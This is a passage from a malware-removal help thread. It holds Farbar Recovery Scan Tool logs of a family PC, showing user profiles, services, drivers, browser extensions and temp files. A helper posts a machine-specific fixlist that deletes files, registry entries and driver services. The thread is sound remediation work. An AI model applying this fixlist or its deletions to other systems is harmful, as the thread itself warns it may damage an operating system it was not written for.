2014-10-31 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 17:14 - 2014-07-06 19:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 17:02 - 2014-08-19 06:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 17:02 - 2011-08-22 17:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 12:06 - 2013-10-19 11:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 06:35 - 2010-11-21 10:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 21:54 - 2011-05-04 21:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 21:53 - 2013-04-14 19:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 21:53 - 2010-11-22 19:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 21:52 - 2014-06-03 19:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 21:28 - 2014-08-01 11:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 21:02 - 2012-12-16 23:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 19:57 - 2012-12-14 01:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 19:56 - 2012-04-03 11:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 19:56 - 2011-08-21 09:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 19:52 - 2012-10-20 19:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 03:52 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 03:38 - 2006-11-02 05:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 03:12 - 2013-08-20 03:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 03:03 - 2006-11-02 03:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 09:07 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 09:06 - 2014-09-28 16:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
2014-10-09 09:01 - 2010-12-25 11:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 08:47 - 2011-01-14 21:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 08:46 - 2013-12-12 09:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

Files to move or delete:
====================
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat


Some content of TEMP:
====================
C:\Users\Bill\AppData\Local\Temp\contentDATs.exe
C:\Users\Bill\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvj9mxx.dll
C:\Users\Bill\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\SecurityScan_Release.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRun.exe
C:\Users\Hannah\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Hannah\AppData\Local\Temp\EBU63AA.exe
C:\Users\Hannah\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Hannah\AppData\Local\Temp\optprosetup.exe
C:\Users\Hannah\AppData\Local\Temp\utt709F.tmp.exe
C:\Users\Nick\AppData\Local\Temp\eauninstall.exe
C:\Users\Nick\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\Nick\AppData\Local\Temp\Quarantine.exe
C:\Users\Nick\AppData\Local\Temp\SimCity 4 Deluxe_uninst.exe
C:\Users\Nick\AppData\Local\Temp\_isB08.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-01 12:53

==================== End Of Log ============================



#13 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 02 November 2014 - 06:44 AM

Hello topper8281,
 

***


Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt

 
start
EmptyTemp:
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKCU\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [AdobeBridge] => [X]
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.


***


FRST / FSRT64: run it again.
  • Right-click FRST / FSRT64 then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#14 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 02 November 2014 - 10:11 AM

Okay here are the two new logs.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 02-11-2014
Ran by Nick (administrator) on WALKER-PC on 02-11-2014 07:07:43
Running from C:\Users\Nick\Desktop
Loaded Profile: Nick (Available profiles: Kristi & Hannah & Nick & Bill & UpdatusUser & Dylan & Administrator)
Platform: Microsoft® Windows Vista™ Ultimate  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 7
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Avast Software) C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe
(UltraVNC) C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe
(Microsoft Corporation) C:\Windows\System32\rdpclip.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(AVAST Software) C:\Program Files\Alwil Software\Avast5\avastui.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Spotify Ltd) C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Google\Update\Install\{FFB4FC8A-5624-4ABD-AEE1-B56D5AEAACF1}\GoogleUpdateSetup.exe
(Google Inc.) C:\Users\Nick\AppData\Local\Temp\GUMFBFA.tmp\GoogleUpdate.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-18] (Microsoft Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-10] (Adobe Systems Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-04-23] (Apple Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS6ServiceManager] => C:\Program Files\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\Alwil Software\Avast5\AvastUI.exe [5223016 2014-10-31] (AVAST Software)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-05-26] (Apple Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [507776 2014-10-07] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [googletalk] => C:\Users\Nick\AppData\Roaming\Google\Google Talk\googletalk.exe [3739648 2007-01-01] (Google)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Google Update] => C:\Users\Nick\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-04-10] (Google Inc.)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\Run: [Spotify Web Helper] => C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1140736 2014-05-03] (Spotify Ltd)
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: G - G:\sources\sperr32.exe x64
HKU\S-1-5-21-2927482541-673307907-4085399872-1003\...\MountPoints2: {b1134796-9622-11e0-9898-0040f4e8e5d1} - F:\noautorun.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.0.285\SSScheduler.exe (McAfee, Inc.)
Startup: C:\Users\Bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Nick\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Alwil Software\Avast5\ashShell.dll (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
BootExecute: autocheck autochk * sdnclean.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/?pc=Z016&form=ZGAPHP
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com?fr=hp-avast&type=odc268
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://search.yahoo.com/yhs/search?type=odc268&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.yahoo.com?fr=hp-avast&type=odc268
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-11-01]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-11-01]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R3 AvastVBoxSvc; C:\Program Files\Alwil Software\Avast5\ng\vbox\AvastVBoxSVC.exe [3192344 2014-10-26] (Avast Software)
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
